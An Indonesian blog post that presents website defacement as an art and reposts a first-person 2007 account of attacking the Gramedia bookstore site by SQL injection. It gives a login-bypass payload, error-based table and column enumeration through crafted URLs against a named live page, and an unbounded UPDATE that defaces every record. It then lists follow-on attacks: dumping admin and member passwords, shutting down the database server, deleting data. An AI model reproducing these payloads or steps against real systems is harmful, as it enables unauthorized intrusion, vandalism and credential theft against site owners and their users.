Deface: SQL Injection Part-1

Deface membutuh seni. Seni Deface=sebuah identify of hacker dalam memperkenalkan eksistensi diri, bagaiman menemukan bug/kelemahan dan cara masuk ke system target. Pengertian sosial enginering merupakan hal utama dan dasar yg harus dipelajari bagi ‘new comer’ hacker. Deface ialah seni utama dimana setiap orang memiliki ciri tersendiri dalam melakukannya, kita dapat menilai tingkat ke ahlian sang hacker dalam deface. Hacker memiliki kunci spesial akses yang menunjukan kelebihan mereka dengan permahaman sbb:

1. Kenali target mu, tujuannya berbagi perasaan sayang.
2. Yakinkan hati kita, mampu kah mencuri “hati” target dengan saluran aliran data dengan kemampuan sosial enginering.
3. Ada pepatah “banyak jalan menuju China” Tidak bisa tembus web, coba aja loe beli hosting yg satu server dengan target, emang harus bermodal coz no education free now
4. Rajin bertanya sama mbah google “alkitab hacker’ www.google.com
5. Di atas gunung masih ada gunung, maka belajarlah banyak dari hal yang tak terhingga, semampu kita

Kalo sudah siap, saatnya dicoba, berikut ini hanya sebatas TRY alias latihan (memang sih cara kuno tapi cukup ampuh buah belajar). Latihan ini di ambil dari VIROLOG.info , silahkan dicoba, Maaf jika sudah kadaluarso.

Hacking/Cracking : Beli Buku Gratis Apa Diface Yach????(SQL-Injection bug in gramedia) By. 4L13N Posted by admin on 2007/6/6 23:17:31 (1958 reads)

Sebelumnya Gw minta maaf Ama www.gramedia.com NB: Gw Cuma Anak Ingusan Yang slalu ingin tau jadi buat yang udeh master lewatin aja oke!!!!Sabtu 2-juni-2007 jam 10 malem Iseng-iseng gw surfing ke situs www.gramedia.com niatnya sey liat-liat buku tiba-tiba ada setan yang bisikin “woi coba dong neh situs” iya coba-coba ga bayar kan???? ya udeh gw klik halaman member truz gw coba pake SQL_Injection dengan username: admin Password: ‘or ”=’ wah gileee bisa masuk, gak nyangka situs sekelas gramedia masih kena ama bug’s kaya gini, dalem hati gw ngomong “woii admin Why???hehe33x bisa beli buku gratis neyyy” kaga’ ah, gw ga’ mw jadi kriminal, logout aja ah!!! lagi-lagi, setan keparat bisikin “Udeh deface tuh situs!!!!” ehmm gimana ya?? udeh kepalang tanggung!! pake cara apa ya, yang enak???Oiya, Update database server aja ahh!!! saatnya mencari informasi, gw buka: http://www.gramedia.com/detil_newsevent.asp?id=061110102137 buat nyari error gw tambahin tanda kutip satu dielakang jadinya kaya gini: http://www.gramedia.com/detil_newsevent.asp?id=061110102137‘ wahhh ada, errornya!!!  inject ahh buat nyari nama tabel n colomnya pake perintah ‘Having 1=1– http://www.gramedia.com/detil_newsevent.asp?id=061110102137‘Having 1=1– kluar error deh : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.NEWSEVENT_ID’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. wahh udaeh dapet nama tabel n kolum pertamanya “td_newsevent nama tabel n NEWSEVENT_ID nama kolum” terusin ahh!!! untuk tau kolum berikutnya gw pake perintah ‘Group+by+kolum_name(NEWSEVENT_ID) http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘group%20by%20td_newsevent.NEWSEVENT_ID– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.JUDUL’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Udeh dapet ney kolum JUDUL looping lagi ahh!!! http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL– Error_Nya : [Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘td_newsevent.PENULIS’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Wahh kali ini kolum PENULIS gw looping lagihttp://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘group%20by%20td_newsevent.NEWSEVENT_ID,JUDUL,PENULIS– truz errornya: (udeh ya gw cape ngetiknya pokoknya nama kolum-kolumnya iniJ ) NEWSEVENT_ID JUDUL PENULIS SUMMARY DESCRIPTION STATUSWawwww Informasinya udeh cukup neyyy…. deface-deface, tiba saatnya untuk menginjeksi database_nya disini gw pake perintah ‘Update+nama_tabel+set+nama_kolum=’pesan’;– jadinya kaya gini: http://www.gramedia.com/detil_newsevent.asp?id=061110102137%20‘update+td_newsevent+set+DESCRIPTION=” <”font%20color=red><”marquee>4L13N%20FOUND%20BUG%20PLEASE%20PATCH%20YOUR%20SYSTEM ‘;– Kok lw gak pake perintah where sich??? Wah Gw terlalu malas untuk itu, lagian biar semua colum DESCRIPTION yang ada di tabel td_newsevent ikut ter_Update semuanya Hehe33x!! Nah ini dia hasilnye….:Gramedia toko buku paling populer se-Indonesia ternyata mempunyai situs yang bisa dibilang amat sangat rentan dari serangan hacker bahkan bocah ingusan yang ga’ tau apa-apa kaya gw juga bisa!!!!>>-A   Apa cuma itu yang bisa kita laku’in tentu TIDAAAAKKK!!!!  kalo ditelusuri lagi kita bisa : - Menambahkan isi database_Nya….pake perintah ‘Insert - mematikan Sql server….pake perintah ;shutdown - mencari username admin n passwordnya… pake perintah union+select ato convert - mencari username member n passwordnya - deface satu halaman ato mungkin Nge_Remote - mendelete database - masih banyak lagi dahhhh cape neyy dah malem Kritik,Saran,Cacian n Makian mail To here_4l13n@yahoo.com  kalo pujian kirim ke_ ALLAH SWT N Rosul2xnya Salam Hangat By. 4L13N

Explore posts in the same categories: Hacking-Cracking-Carding dan Sejenisnya